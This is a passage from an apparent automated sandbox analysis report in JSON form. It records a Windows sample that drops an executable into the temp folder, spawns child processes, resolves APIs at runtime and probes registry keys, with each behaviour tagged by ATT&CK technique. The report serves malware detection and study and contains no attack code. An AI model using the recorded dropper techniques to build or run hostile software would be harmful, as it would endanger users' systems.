\"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003216)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da59df75@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"1e001f0000104800@msvcrt.dll\"\n \"13001400606d4800@msvcrt.dll\"\n \"15001600c03e2a6a@ADVAPI32.dll\"\n \"0e000f00703f2a6a@ADVAPI32.dll\"\n \"0e000f00cc3f2a6a@ADVAPI32.dll\"\n \"11001200b4472a6a@ADVAPI32.dll\"\n \"1100120048482a6a@ADVAPI32.dll\"\n \"120013008c482a6a@ADVAPI32.dll\"\n \"12001300e4482a6a@ADVAPI32.dll\"\n \"14001500386e2a6a@ADVAPI32.dll\"\n \"14001500506e2a6a@ADVAPI32.dll\"\n \"14001500686e2a6a@ADVAPI32.dll\"\n \"17001800806e2a6a@ADVAPI32.dll\"\n \"0d000e00986e2a6a@ADVAPI32.dll\"\n \"11001200a86e2a6a@ADVAPI32.dll\"\n \"11001200bc6e2a6a@ADVAPI32.dll\"\n \"0d000e0044662a6a@WININET.dll\"\n \"0d000e00b4662a6a@WININET.dll\"\n \"10001100ec662a6a@WININET.dll\"\n \"1000110090672a6a@WININET.dll\"\n \"10001100006f2a6a@WININET.dll\"\n \"10001100146f2a6a@WININET.dll\"\n \"14001500286f2a6a@WININET.dll\"\n \"14001500406f2a6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"CreateProcessW\" with parameter \":*C:\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe *\" - (UID: 00000000-00002776)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZVUSTG\" - (UID: 00000000-00004576)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753b0000\n \"085cda53603755dc.exe\" loaded module \"OLE32.DLL\" at base 759f0000\n \"085cda53603755dc.exe\" loaded module \"ADVAPI32.DLL\" at base 76f00000\n \"085cda53603755dc.exe\" loaded module \"KERNEL32.DLL\" at base 760e0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753b0000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75230000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 777a0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76230000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75520000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 714b0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75780000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 77760000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ae0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 760e0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 777A0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 777A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an writable section named \".data\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an writable section named \".bss\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an writable section named \".idata\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an writable section named \".CRT\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an writable section named \".tls\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003216)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da ...\" (UID: 00000000-00004576)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZVUSTG\" (UID: 00000000-00003216)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da ...\" (UID: 00000000-00004576)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZVUSTG\" (UID: 00000000-00003216)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" was detected as \"MinGW\" and name: \"Compiler\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002776]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VERSION.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" reads file \"c:\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\version.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002776]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"A6195FE3E14EE149621D0645788C516BD2BF2B25D1ED59B5C2A2A504DA863EA5\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n 